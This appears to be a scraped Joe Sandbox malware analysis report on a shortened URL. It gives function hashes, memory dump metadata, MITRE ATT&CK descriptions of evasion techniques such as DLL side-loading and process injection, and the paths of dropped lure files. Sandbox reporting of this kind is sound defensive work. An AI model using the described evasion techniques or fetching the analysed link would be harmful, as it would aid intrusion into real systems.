Opcode ID: 0492226e26eee9d162099c9cd921214d54d809901a9ede7e66bf950444893a77
Instruction ID: 7e97d4ae279e505faf895c8bd94757edb597e1160099d4599077ce5ae9348b82
Opcode Fuzzy Hash: 0492226e26eee9d162099c9cd921214d54d809901a9ede7e66bf950444893a77
Instruction Fuzzy Hash: 0301A4B65097806FC7118F16EC41893BFE8DF8663071984ABE849CB252D239B909CB72

Function 0149082E Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2151196478.0000000001490000.00000040.00000020.00020000.00000000.sdmp, Offset: 01490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1490000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8597c22dc299be4e7407d167144d9f5372b2d7933bdda59850fbe30622472d4f
Instruction ID: d68a680aa82de9660b37782f8af77d2d24bf4fc3ef45158620963a4d35e8cfca
Opcode Fuzzy Hash: 8597c22dc299be4e7407d167144d9f5372b2d7933bdda59850fbe30622472d4f
Instruction Fuzzy Hash: FEF082B29056046B9200DF55ED46856F7ECDF84521F04C56AEC088B300E27AAA154AF2

Function 01490606 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2151196478.0000000001490000.00000040.00000020.00020000.00000000.sdmp, Offset: 01490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1490000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3b61ce5c8f6fd9b3782714188843fb29a5365181178049bac1bf7c672956ea7
Instruction ID: b113b13db3180f68f1d99ae9b037875b9b5e494f975f20f1282fbf1d3c2761cd
Opcode Fuzzy Hash: b3b61ce5c8f6fd9b3782714188843fb29a5365181178049bac1bf7c672956ea7
Instruction Fuzzy Hash: 62E012B66046045B9650DF0AFC41452F7D8EB88631718C47FDC1D8B711D679B505CBA5

Function 01640C50 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2151249138.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1640000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bb00d331a07e6b6e8dfdf47e93b54c9abec3f80ae2ef115b8e926b44b8ba8fb
Instruction ID: ba7a0c7ed3142299aba09991aca6507bf6ca38976dd23adedbedfdb1758a1436
Opcode Fuzzy Hash: 4bb00d331a07e6b6e8dfdf47e93b54c9abec3f80ae2ef115b8e926b44b8ba8fb
Instruction Fuzzy Hash: F7E0DF31F142942FCB44EBB858542EE7FF2DB86254B5684B9C009CB342EE39CE038390

Function 01640C60 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2151249138.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1640000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80ffdbad77fc4ed2005857cad1a69cf02bbdf9d648af436dbdf2451a29656831
Instruction ID: f41d45c1e7b97b96407977493549d3b9ada72c4c1a420410bb6ef6d2bc5432f0
Opcode Fuzzy Hash: 80ffdbad77fc4ed2005857cad1a69cf02bbdf9d648af436dbdf2451a29656831
Instruction Fuzzy Hash: 03D01231F042182B8B48DBB958546AE7BEA9BC4154B564479D109D7341FE359D418790

Function 01640DD1 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2151249138.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1640000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7207e0ce14ac27ed39be5ae91e40421db1c8a7692d1033e9aad392acfa91dd40
Instruction ID: 3a8775c5509be526c713fbe28cb0a131e01acb9684ad491d00e513495e213d25
Opcode Fuzzy Hash: 7207e0ce14ac27ed39be5ae91e40421db1c8a7692d1033e9aad392acfa91dd40
Instruction Fuzzy Hash: EFE086345483905FCB074B3498145E57FB15FD3218F1980DDD9848F663C6258851D780

Function 01640E08 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2151249138.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1640000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a4909ecc2b8432961a8e64090f738b35eb53f26549194e5728e3bd5b1ec0f1a
Instruction ID: 15e8d1168f8e8695774a790d78182e0b2e21639f85b0a972f54f185b5c0b42b7
Opcode Fuzzy Hash: 4a4909ecc2b8432961a8e64090f738b35eb53f26549194e5728e3bd5b1ec0f1a
Instruction Fuzzy Hash: F7E0C2242193C04FC70257349C245A83F616F9B204F4980D9CA844F373C739D812D750

Function 013123F4 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2150651956.0000000001312000.00000040.00000800.00020000.00000000.sdmp, Offset: 01312000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1312000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 849a23bccb3ef5a4e46a3f7f3a1b7f3123baa49f077c0768d0e7bbe07902a55c
Instruction ID: 58a3ee60e6f20285f748b733e29ee6426b38c8e674915d813a45f071ae093053
Opcode Fuzzy Hash: 849a23bccb3ef5a4e46a3f7f3a1b7f3123baa49f077c0768d0e7bbe07902a55c
Instruction Fuzzy Hash: 4CD02EB92406804FE31A8E1CC1A4B863BE8AB40708F0A00F9E8008B367CB28E481C200

Function 013123BC Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2150651956.0000000001312000.00000040.00000800.00020000.00000000.sdmp, Offset: 01312000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1312000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3946bdcfc17f0128af80d81cd31f080e5d7977ab9970a84dde28e6b7cfc30e69
Instruction ID: abb17c674703684666443ec24ce9d8951a5ca4a9d17f8b6caa2ad2fd4f106b12
Opcode Fuzzy Hash: 3946bdcfc17f0128af80d81cd31f080e5d7977ab9970a84dde28e6b7cfc30e69
Instruction Fuzzy Hash: A8D05E342002814FDB19DE1CC6D4F5A37D8AB40718F2A48E8AC108B266C7A8D8C1DA00

Function 01640DE0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2151249138.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1640000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08045cd33b875f411622025a5c8d822bde10a955bfa416a09262daa363f5c849
Instruction ID: 787ccb1a220bdf211e69352d879dea295facbff4d11f55dd9a1c2d9e0d74d5d8
Opcode Fuzzy Hash: 08045cd33b875f411622025a5c8d822bde10a955bfa416a09262daa363f5c849
Instruction Fuzzy Hash: 35C012302002248FD714AB68DC18A6577966BD0608F49C06896080B361DF74EC50C6C4

Function 01640E18 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2151249138.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1640000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfbc79f28fdf607221c044efcd5cd9c59cd5c32415a6ad327533d0788aa08ea3
Instruction ID: 4d58f734a3d034604150af7ffa8ec37646219e01701b92146092636ebf5c504c
Opcode Fuzzy Hash: cfbc79f28fdf607221c044efcd5cd9c59cd5c32415a6ad327533d0788aa08ea3
Instruction Fuzzy Hash: BEC012302003148FC714AB68DD18A6977966BD8604F89C0689A081B761DB74EC51C684

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://tinyurl.com/yep5ph9f

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\?\Documents.pdf

C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\?\Evidence.??d??o??c??x

C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\?\Images.png

C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe

C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\vcruntime140.dll

C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\version.dll

C:\Users\user\AppData\Local\Temp\unarchiver.log

C:\Users\user\Downloads\68c8e194-372f-4d65-ab89-d63f8d42e0ea.tmp

C:\Users\user\Downloads\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.zip.crdownload

C:\Users\user\Downloads\Ozn.men._o_zjiat.n._poruaen._pr.v_duaevn.ho_vlastnictv._.zip (copy)

C:\Users\user\Downloads\Ozn.men._o_zjiat.n._poruaen._pr.v_duaevn.ho_vlastnictv._.zip.crdownload (copy)

Static File Info

File Icon

Network Behavior

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: chrome.exePID: 5556, Parent PID: 2436

General

Windows Analysis Report
https://tinyurl.com/yep5ph9f